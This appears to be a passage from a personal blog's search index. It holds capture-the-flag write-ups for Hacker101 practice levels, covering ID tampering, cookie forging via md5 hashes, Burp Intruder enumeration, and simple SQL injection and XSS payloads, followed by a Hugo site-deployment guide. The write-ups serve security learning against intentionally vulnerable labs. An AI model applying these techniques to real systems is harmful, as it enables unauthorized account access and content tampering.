Let\u0026rsquo;s play with that.\nBingo, id=b shows us admin user\u0026rsquo;s profile with a private blog post on page /index.php?page=view.php\u0026amp;id=2\nLet\u0026rsquo;s open it and collect a FLAG.\nFlag2 Hint0: You should definitely use \u0026quot;Inspect Element\u0026quot; on the form when creating a new post Click on Write a new post link to open page /index.php?page=create.php.\nCheck the source of the page with the form. Notice the hidden input with name=\u0026quot;user_id\u0026quot; value=\u0026quot;2\u0026quot; hard-coded fields.\nLet\u0026rsquo;s see how our form works in Burp!\nFirst test is to create a public post:\nParameters passed to create.php are:\ntitle=test1title\u0026amp;body=test1content\u0026amp;user_id=2\nCreate a private post too:\nParameters are now:\ntitle=test2title\u0026amp;body=test2content\u0026amp;private=on\u0026amp;user_id=2\nIn Burp, we can simply modify POST request parameters before sending to the server. Let\u0026rsquo;s create another post that we will tamper with a bit :)\nFor profile ID, the page used letters. User ID for user was c, which is the third letter. User ID of admin was b, which is the second.\nIn the request, we see numbers as user_id. 2 is the third number (0, 1, 2), so how about trying user_id=1?\nEdit user_id=2 to user_id=1 in the intercepted POST request and hit Forward.\nJust another FLAG!\nFlag3 Hint0: 189 * 5 So far, our known pages are:\nFunctional pages:\naccount.php create.php delete.php edit.php profile.php sign_in.php sign_out.php view.php Posts can be read on view.php\u0026amp;id=1..6\nCommon question: What else is there?!\nRemember, posts are created on pages indexed by numbers. The hint contains numbers.\nAt this point, speculating that we will find our FLAG on /index.php?page=view.php\u0026amp;id=945 might be the quick solution.\nI\u0026rsquo;ve struggled ~2 hours with ffuf to FUZZ the id parameter in the request, without luck. 
I\u0026rsquo;ll try that later.\nThere may be a bunch of wordlists containing numbers only, but, to save time, let\u0026rsquo;s create our own containing numbers from 0 to 1000. Find more here or here.\n#!/usr/bin/python3 df=open(\u0026#39;numbers.txt\u0026#39;,\u0026#39;w\u0026#39;) for i in range(0,1000): df.write(str(i)) df.write(\u0026#39;\\n\u0026#39;) df.close() Open a text editor, insert above and save as numbers.py.\nAdd permission for execution with\nchmod +x numbers.py and run with\npython3 numbers.py I beg your pardon for a dirty little python script above, not the most elegant solution. But, once my supervisor said: \u0026ldquo;a working program is better today, than a perfect one tomorrow\u0026rdquo; :)\nI gave a shot for Burp Intruder, just for the sake of it..\nEnable Intercept on Proxy tab and refresh page with the first post. Right click on the request and select Send to Intruder.\nOn the Positions tab, clear all payload positions with Clear § on the right and select only the value of id parameter (here: 1). Click Add §.\nBurp Suite Community Edition is free, but Intruder is extremely slow due to throttling. So, I\u0026rsquo;ve created a shorter wordlist, containing only [1,2,3,4,5,6,7,8,9,945].\nSwitch to Payloads tab and load a wordlist under Payload Options [Simple list] using the Load\u0026hellip; button.\nWe\u0026rsquo;re all set, hit Start attack on the top right corner.\nGreat, at least that worked. Check Request 1 where Payload is 1.\nA bit ugly, how about switching to Render tab? Much better.\nIf you check the results, you\u0026rsquo;ll see that all the pages with Post not found response will have the same 1500 length.\nOkay, get the FLAG by checking Request 10 with Payload 945:\nFlag4 Hint0: You can edit your own posts, what about someone else\u0026rsquo;s? After you logon with user / password credentials from Flag1, you can see two posts on the Home page.\nOne of them can be edited , the other\u0026rsquo;s author is admin. 
Open the Hello everyone! post for view.\nThe id=3 at the end of the URL identifies the post. Get back to Home page and open the other post by admin.\nIt has id=1. Let\u0026rsquo;s open the post Hello everyone! for editing and change the id from 3 to 1 (and hit enter):\nChange something and then Save post.\nA new FLAG:\nFlag5 Hint0: The cookie allows you to stay signed in. Can you figure out how they work so you can sign in to user with ID 1? We already know from Flag1, that we can view admin\u0026rsquo;s profile by changing id=c to id=b.\nLogged in as user, open developer tools, switch to Application tab and select the website\u0026rsquo;s cookies on the left, under Storage.\nOur user has c81e728d9d4c2f636f067f89cc14862c as id. It\u0026rsquo;s a hash; we need to look up what value produced it. I\u0026rsquo;ve used this page for the task, the result is 2. Remember Flag2? This is our user_id.\nWe can edit cookie values with the browser\u0026rsquo;s developer tools, but first we need the md5 hash value of 1. Our friend is the terminal.\necho -n 1|md5sum Sign out from the page. Cookies will be flushed.\nRight-click on the area where cookies would be listed and select Add new\nUse id as Name and c4ca4238a0b923820dcc509a6f75849b as value.\nClick Home and you can see your new FLAG, logged in as admin.\nWe can also use Burp to intercept the requests and tamper with the cookies before forwarding them.\nFlag6 Hint0: Deleting a post seems to take an ID that is not a number. Can you figure out what it is? Deleting a post will pass the post id to the /index.php?page=delete.php page as a hashed value.\nWe can guess from the same post\u0026rsquo;s edit link in the above line (/index.php?page=edit.php\u0026amp;id=4), that the hashed value will be close to 4, but to be sure, I\u0026rsquo;ve checked it on this page:\nLet\u0026rsquo;s delete Admin\u0026rsquo;s Hello world post, which has an id=1. 
Using the command from the previous Flag:\necho -n 1|md5sum Our URL will be:\n/index.php?page=delete.php\u0026amp;id=c4ca4238a0b923820dcc509a6f75849b\n\u0026hellip; resulting in the last FLAG!\nTakeaway(s) Look for easy-to-guess passwords Check if you can tamper with input parameters Broken authentication (can access other users\u0026rsquo; private content) Use automated scanning to check for missed pages (due to high page id or other weird stuff) Weak hashing (md5) used in cookie for authentication id to obfuscate link ","permalink":"https://d0rksec.github.io/writeups/h101/postbook/","summary":"Small PHP site with private/public posts to play with","title":"Hacker101 - Postbook"},{"content":"What A small CMS, with very basic functions.\nDifficulty: Easy\nFlag0 Hint0: Try creating a new page Hit the link Create a new page. Fill out title and content. Click Save button to create the page. Hint1: How are pages indexed? Pages are indexed with ascending numbers in a form of /page/$ (like *.ctf.hacker101.com/page/1, /2, etc.)\nHint2: Look at the sequence of IDs Testing is /page/1.\nMarkdown Test is /page/2.\nThe page we have created starts at */page/11.\nWhat is between page/2 and page/11?\nHint3: If the front door doesn\u0026rsquo;t open, try the window Edit the page ID in the address bar and open page/3, page/4, etc.\nYou\u0026rsquo;ll find that /page/5 is Forbidden.\nHint4: In what ways can you retrieve page contents? When you open /page/1 (Testing) or /page/2 (Markdown Test), or on the page you\u0026rsquo;ve created, see that link Edit this page? Open any of the pages above for editing and check the URL! It is /page/edit/$.\nChange the ID to 5 (/page/edit/5) and collect the first FLAG. 
Flag1 Hint0: Make sure you tamper with every input What inputs do we have on this site (make a habit of manually looking around on a site)?\nThere are form inputs on Edit Page (/page/edit/$) and on Create Page (/page/create):\nTitle: \u0026lt;input type=\u0026quot;text\u0026quot;\u0026gt;\nText: \u0026lt;textarea name=\u0026quot;body\u0026quot;\u0026gt;\nHint1: Have you tested for the usual culprits? XSS, SQL injection, path injection XSS has worked only on Title field (see FLAG2). There is a comment under the textarea: \u0026ldquo;Markdown is supported, but scripts are not\u0026rdquo;.\nFor SQL injection, see last hint.\nNo luck with path injection.\nHint2: Bugs often occur when an input should always be one type and turns out to be another Title field expects text, javascript worked here (see FLAG2).\nBody textarea accepts only markdown, javascript filtered there.\nURL expects only numbers as page ID.\nHint3: Remember, form submissions aren\u0026rsquo;t the only inputs that come from browsers \u0026hellip; Also, there is the address bar in the browser.\nPut a single apostrophe (') after the page\u0026rsquo;s URL in the address bar, like /page/edit/1' for the FLAG.\nThis simulates the case when a page ID (in this case \u0026ldquo;1\u0026rdquo;) is processed by a backend script and used in an SQL query without sanitizing it first. See more on SQL injection (a very basic injection would be something like /page/edit/1' or 1=1; --), but here, to get the flag, a single apostrophe is enough. 
I\u0026rsquo;ve tried some basic injection after it without luck.\nFlag2 Hint0: Sometimes a given input will affect more than one page The first input I\u0026rsquo;ve tried has resulted in a FLAG.\nOpen a page for editing, then insert \u0026lt;script\u0026gt;alert('1')\u0026lt;/script\u0026gt; into the Title field:\nCreate the page.\nHint1: The bug you are looking for doesn\u0026rsquo;t exist in the most obvious place this input is shown You are inserting the XSS on some page\u0026rsquo;s Title field. If you reload the page, nothing happens. Try navigating to the Home page :)\nHome page lists the page titles in an unordered list. List items use Title field values without sanitization. This is where our payload kicks in.\nFlag3 Hint0: Script tags are great, but what other options do you have? Using markdown, you can insert URLs, buttons, images on the page.\nIf you load Markdown Test page (/page/2), there is an example for an image (broken) and a button element.\nEdit the page.\nLook up in an HTML/JS reference what inline options you have for a button tag. I\u0026rsquo;ve inserted onclick=\u0026quot;alert('3')\u0026quot; here.\nSave the page; the XSS works just fine. But where\u0026rsquo;s my FLAG?\nCheck the source of the page to get your last FLAG!\nI\u0026rsquo;ve also tried XSS on the image element, following this link, but couldn\u0026rsquo;t manage to make it work.\nTakeaway(s) Manually try all available functions of the site, understand how they work Watch for low-hanging fruits, like unsanitized user inputs (XSS, SQLi) Look for \u0026ldquo;missing\u0026rdquo; pages ","permalink":"https://d0rksec.github.io/writeups/h101/micro-cms_v1/","summary":"A small CMS with very basic functions","title":"Hacker101 - Micro CMS_v1"},{"content":"What A simple, one-page site.\nDifficulty: Trivial\nFlag0 Hint0: Take a look at the source for the page Hit F12 and check Elements tab. Check all sources of the page, even \u0026lt;head\u0026gt; and \u0026lt;style\u0026gt;. 
Hint1: Does anything seem out of the ordinary? There is a background-image added to the body element in \u0026lt;style\u0026gt;, but we can\u0026rsquo;t see it rendered.\nHint2: The page looks really plain Is the image even loading? Is it available (Status 200)? Hint3: What is that image? Open the image in a new tab. If you download the image and open it with Chrome, you\u0026rsquo;ll only see a white square. If you try to open it with an image viewer, it will throw an error.\nLet\u0026rsquo;s create a copy of the image and change the file extension from .png to .txt. Now you can open the file with a simple text editor to see your flag.\nTakeaway(s) Always check html, css, js sources for mistakes, forgotten comments and other weird stuff ","permalink":"https://d0rksec.github.io/writeups/h101/get-started/","summary":"Trivial - A little something to get you started","title":"Hacker101 - Get Started"},{"content":"Hugo \u0026lt;3 GitHub Pages With Hugo, I was able to quickly deploy a functional website with plenty of themes to select from. Hugo sits somewhere between building a site from HTML+CSS+JS by hand and a fully hosted site, where your only job is to edit content in some online Markdown editor. With this setup, you can manually change theme settings or the structure of your content, play with git - if you want. 
If you\u0026rsquo;re satisfied with the look of your site, you can just push content to it.\nThe pages you would need the most to start with David Saltares - Easily deploy your Hugo site to Github Pages Official Hugo Quickstart Short list of steps Create d0rksec.github.io repo (public, with readme.md)\nCreate d0rksec.github.io-dev repo (private, with readme.md)\nClone d0rksec.github.io-dev repo to computer (for example, into /stuff)\ngit clone https://github.com/d0rksec/d0rksec.github.io-dev.git Populate /stuff/d0rksec.github.io-dev/ with a blank site (following steps on local computer):\nInstall Hugo (.deb worked well, had permission issues with snap package)\nCreate a blank site\nhugo new site /stuff/d0rksec.github.io-dev/ --force Generate a public/private key pair for publishing\nssh-keygen -t rsa -b 4096 -C \u0026#34;\u0026lt;email\u0026gt;\u0026#34; -f publish_key -P \u0026#34;\u0026#34; On GitHub, add deploy key for d0rksec.github.io and paste contents of publish_key.pub\nOn GitHub, add new secret to d0rksec.github.io-dev as ACTIONS_DEPLOY_KEY and paste contents of publish_key\nCreate /stuff/d0rksec.github.io-dev/.gitignore\nInstall theme (PaperMod) as submodule\ncd /stuff/d0rksec.github.io-dev git submodule add --depth=1 https://github.com/adityatelange/hugo-PaperMod.git themes/PaperMod git submodule update --init --recursive Copy favicon files into /stuff/d0rksec.github.io-dev/static/\nCreate /stuff/d0rksec.github.io-dev/content/archives.md\nCreate /stuff/d0rksec.github.io-dev/content/search.md\nCreate /stuff/d0rksec.github.io-dev/.github/workflows/deploy.yml\nAfter hugo server -D, check https://localhost:1313 to see how the site looks\nIn /stuff/d0rksec.github.io-dev/\ngit add --all git commit -m \u0026#34;site created\u0026#34; git push -u origin main Cross fingers and check https://github.com/d0rksec/d0rksec.github.io/actions\nUseful links https://gohugo.io/getting-started/quick-start/ https://saltares.com/easily-deploy-your-hugo-site-to-github-pages/ 
https://github.com/adityatelange/hugo-PaperMod/wiki/Installation https://github.com/peaceiris/actions-gh-pages https://muhannad0.github.io/post/using-github-actions-to-deploy-my-blog/ https://medium.com/@asishrs/automate-your-github-pages-deployment-using-hugo-and-actions-518b959a51f9 ","permalink":"https://d0rksec.github.io/2022/04/hugo-101-deploy-to-github-pages/","summary":"How I created this site","title":"Hugo 101 - Deploy to GitHub Pages"}]